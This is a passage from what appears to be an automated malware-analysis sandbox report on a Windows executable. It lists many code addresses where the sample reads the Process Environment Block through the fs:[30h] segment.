      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov ecx, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov ecx, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81CC68 mov eax, dword ptr fs:[00000030h]11_2_1D81CC68
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85BC6E mov eax, dword ptr fs:[00000030h]11_2_1D85BC6E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85BC6E mov eax, dword ptr fs:[00000030h]11_2_1D85BC6E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D820C79 mov eax, dword ptr fs:[00000030h]11_2_1D820C79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D820C79 mov eax, dword ptr fs:[00000030h]11_2_1D820C79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D820C79 mov eax, dword ptr fs:[00000030h]11_2_1D820C79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D828C79 mov eax, dword ptr fs:[00000030h]11_2_1D828C79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D828C79 mov eax, dword ptr fs:[00000030h]11_2_1D828C79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D828C79 mov eax, dword ptr fs:[00000030h]11_2_1D828C79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D828C79 mov eax, dword ptr fs:[00000030h]11_2_1D828C79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D828C79 mov eax, dword ptr fs:[00000030h]11_2_1D828C79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A8F8B mov eax, dword ptr fs:[00000030h]11_2_1D8A8F8B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A8F8B mov eax, dword ptr fs:[00000030h]11_2_1D8A8F8B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A8F8B mov eax, dword ptr fs:[00000030h]11_2_1D8A8F8B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov ecx, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830F90 mov eax, dword ptr fs:[00000030h]11_2_1D830F90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84BF93 mov eax, dword ptr fs:[00000030h]11_2_1D84BF93
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D821FAA mov eax, dword ptr fs:[00000030h]11_2_1D821FAA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D824FB6 mov eax, dword ptr fs:[00000030h]11_2_1D824FB6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84CFB0 mov eax, dword ptr fs:[00000030h]11_2_1D84CFB0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84CFB0 mov eax, dword ptr fs:[00000030h]11_2_1D84CFB0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D858FBC mov eax, dword ptr fs:[00000030h]11_2_1D858FBC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81BFC0 mov eax, dword ptr fs:[00000030h]11_2_1D81BFC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1FC9 mov eax, dword ptr fs:[00000030h]11_2_1D8A1FC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D819FD0 mov eax, dword ptr fs:[00000030h]11_2_1D819FD0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FFDC mov eax, dword ptr fs:[00000030h]11_2_1D89FFDC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FFDC mov eax, dword ptr fs:[00000030h]11_2_1D89FFDC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FFDC mov eax, dword ptr fs:[00000030h]11_2_1D89FFDC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FFDC mov ecx, dword ptr fs:[00000030h]11_2_1D89FFDC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FFDC mov eax, dword ptr fs:[00000030h]11_2_1D89FFDC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FFDC mov eax, dword ptr fs:[00000030h]11_2_1D89FFDC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DEFD3 mov eax, dword ptr fs:[00000030h]11_2_1D8DEFD3
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov ecx, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov ecx, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov ecx, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov ecx, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE0 mov eax, dword ptr fs:[00000030h]11_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4FFF mov eax, dword ptr fs:[00000030h]11_2_1D8F4FFF
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D848FFB mov eax, dword ptr fs:[00000030h]11_2_1D848FFB
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83CF00 mov eax, dword ptr fs:[00000030h]11_2_1D83CF00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83CF00 mov eax, dword ptr fs:[00000030h]11_2_1D83CF00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85BF0C mov eax, dword ptr fs:[00000030h]11_2_1D85BF0C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85BF0C mov eax, dword ptr fs:[00000030h]11_2_1D85BF0C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85BF0C mov eax, dword ptr fs:[00000030h]11_2_1D85BF0C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FF03 mov eax, dword ptr fs:[00000030h]11_2_1D89FF03
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FF03 mov eax, dword ptr fs:[00000030h]11_2_1D89FF03
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FF03 mov eax, dword ptr fs:[00000030h]11_2_1D89FF03
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D860F16 mov eax, dword ptr fs:[00000030h]11_2_1D860F16
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D860F16 mov eax, dword ptr fs:[00000030h]11_2_1D860F16
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D860F16 mov eax, dword ptr fs:[00000030h]11_2_1D860F16
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D860F16 mov eax, dword ptr fs:[00000030h]11_2_1D860F16
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4F1D mov eax, dword ptr fs:[00000030h]11_2_1D8F4F1D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81FF30 mov edi, dword ptr fs:[00000030h]11_2_1D81FF30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DF36 mov eax, dword ptr fs:[00000030h]11_2_1D83DF36
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DF36 mov eax, dword ptr fs:[00000030h]11_2_1D83DF36
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DF36 mov eax, dword ptr fs:[00000030h]11_2_1D83DF36
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DF36 mov eax, dword ptr fs:[00000030h]11_2_1D83DF36
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A8F3C mov eax, dword ptr fs:[00000030h]11_2_1D8A8F3C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A8F3C mov eax, dword ptr fs:[00000030h]11_2_1D8A8F3C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A8F3C mov ecx, dword ptr fs:[00000030h]11_2_1D8A8F3C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A8F3C mov ecx, dword ptr fs:[00000030h]11_2_1D8A8F3C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DBF4D mov eax, dword ptr fs:[00000030h]11_2_1D8DBF4D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DAF50 mov ecx, dword ptr fs:[00000030h]11_2_1D8DAF50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DEF66 mov eax, dword ptr fs:[00000030h]11_2_1D8DEF66
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81BF70 mov eax, dword ptr fs:[00000030h]11_2_1D81BF70
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D821F70 mov eax, dword ptr fs:[00000030h]11_2_1D821F70
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4F7C mov eax, dword ptr fs:[00000030h]11_2_1D8F4F7C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AF72 mov eax, dword ptr fs:[00000030h]11_2_1D84AF72
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D876F70 mov eax, dword ptr fs:[00000030h]11_2_1D876F70
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81EF79 mov eax, dword ptr fs:[00000030h]11_2_1D81EF79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81EF79 mov eax, dword ptr fs:[00000030h]11_2_1D81EF79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81EF79 mov eax, dword ptr fs:[00000030h]11_2_1D81EF79
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84BE80 mov eax, dword ptr fs:[00000030h]11_2_1D84BE80
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AE89 mov eax, dword ptr fs:[00000030h]11_2_1D84AE89
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AE89 mov eax, dword ptr fs:[00000030h]11_2_1D84AE89
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E0EAD mov eax, dword ptr fs:[00000030h]11_2_1D8E0EAD
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E0EAD mov eax, dword ptr fs:[00000030h]11_2_1D8E0EAD
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85CEA0 mov eax, dword ptr fs:[00000030h]11_2_1D85CEA0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov ecx, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov ecx, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov eax, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov ecx, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov ecx, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov eax, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov ecx, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov ecx, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov eax, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov ecx, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov ecx, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB2 mov eax, dword ptr fs:[00000030h]11_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852EB8 mov eax, dword ptr fs:[00000030h]11_2_1D852EB8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852EB8 mov eax, dword ptr fs:[00000030h]11_2_1D852EB8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4EC1 mov eax, dword ptr fs:[00000030h]11_2_1D8F4EC1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85BED0 mov eax, dword ptr fs:[00000030h]11_2_1D85BED0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E9ED2 mov eax, dword ptr fs:[00000030h]11_2_1D8E9ED2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D861ED8 mov eax, dword ptr fs:[00000030h]11_2_1D861ED8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D823EE2 mov eax, dword ptr fs:[00000030h]11_2_1D823EE2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D851EED mov eax, dword ptr fs:[00000030h]11_2_1D851EED
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D851EED mov eax, dword ptr fs:[00000030h]11_2_1D851EED
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D851EED mov eax, dword ptr fs:[00000030h]11_2_1D851EED
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DEEE7 mov eax, dword ptr fs:[00000030h]11_2_1D8DEEE7
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D822EE8 mov eax, dword ptr fs:[00000030h]11_2_1D822EE8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D822EE8 mov eax, dword ptr fs:[00000030h]11_2_1D822EE8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D822EE8 mov eax, dword ptr fs:[00000030h]11_2_1D822EE8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D822EE8 mov eax, dword ptr fs:[00000030h]11_2_1D822EE8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8C3EFC mov eax, dword ptr fs:[00000030h]11_2_1D8C3EFC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81CEF0 mov eax, dword ptr fs:[00000030h]11_2_1D81CEF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81CEF0 mov eax, dword ptr fs:[00000030h]11_2_1D81CEF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81CEF0 mov eax, dword ptr fs:[00000030h]11_2_1D81CEF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81CEF0 mov eax, dword ptr fs:[00000030h]11_2_1D81CEF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81CEF0 mov eax, dword ptr fs:[00000030h]11_2_1D81CEF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81CEF0 mov eax, dword ptr fs:[00000030h]11_2_1D81CEF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826E00 mov eax, dword ptr fs:[00000030h]11_2_1D826E00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826E00 mov eax, dword ptr fs:[00000030h]11_2_1D826E00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826E00 mov eax, dword ptr fs:[00000030h]11_2_1D826E00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826E00 mov eax, dword ptr fs:[00000030h]11_2_1D826E00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D823E01 mov eax, dword ptr fs:[00000030h]11_2_1D823E01
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4E03 mov eax, dword ptr fs:[00000030h]11_2_1D8F4E03
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D858E15 mov eax, dword ptr fs:[00000030h]11_2_1D858E15
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FE1F mov eax, dword ptr fs:[00000030h]11_2_1D89FE1F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FE1F mov eax, dword ptr fs:[00000030h]11_2_1D89FE1F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FE1F mov eax, dword ptr fs:[00000030h]11_2_1D89FE1F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89FE1F mov eax, dword ptr fs:[00000030h]11_2_1D89FE1F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D823E14 mov eax, dword ptr fs:[00000030h]11_2_1D823E14
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D823E14 mov eax, dword ptr fs:[00000030h]11_2_1D823E14
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D823E14 mov eax, dword ptr fs:[00000030h]11_2_1D823E14
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81BE18 mov ecx, dword ptr fs:[00000030h]11_2_1D81BE18
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E8E26 mov eax, dword ptr fs:[00000030h]11_2_1D8E8E26
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E8E26 mov eax, dword ptr fs:[00000030h]11_2_1D8E8E26
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E8E26 mov eax, dword ptr fs:[00000030h]11_2_1D8E8E26
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E8E26 mov eax, dword ptr fs:[00000030h]11_2_1D8E8E26
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D822E32 mov eax, dword ptr fs:[00000030h]11_2_1D822E32
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85CE3F mov eax, dword ptr fs:[00000030h]11_2_1D85CE3F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B6E30 mov eax, dword ptr fs:[00000030h]11_2_1D8B6E30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B6E30 mov eax, dword ptr fs:[00000030h]11_2_1D8B6E30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B5E30 mov eax, dword ptr fs:[00000030h]11_2_1D8B5E30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B5E30 mov ecx, dword ptr fs:[00000030h]11_2_1D8B5E30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B5E30 mov eax, dword ptr fs:[00000030h]11_2_1D8B5E30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B5E30 mov eax, dword ptr fs:[00000030h]11_2_1D8B5E30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B5E30 mov eax, dword ptr fs:[00000030h]11_2_1D8B5E30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B5E30 mov eax, dword ptr fs:[00000030h]11_2_1D8B5E30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81FE40 mov eax, dword ptr fs:[00000030h]11_2_1D81FE40
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81AE40 mov eax, dword ptr fs:[00000030h]11_2_1D81AE40
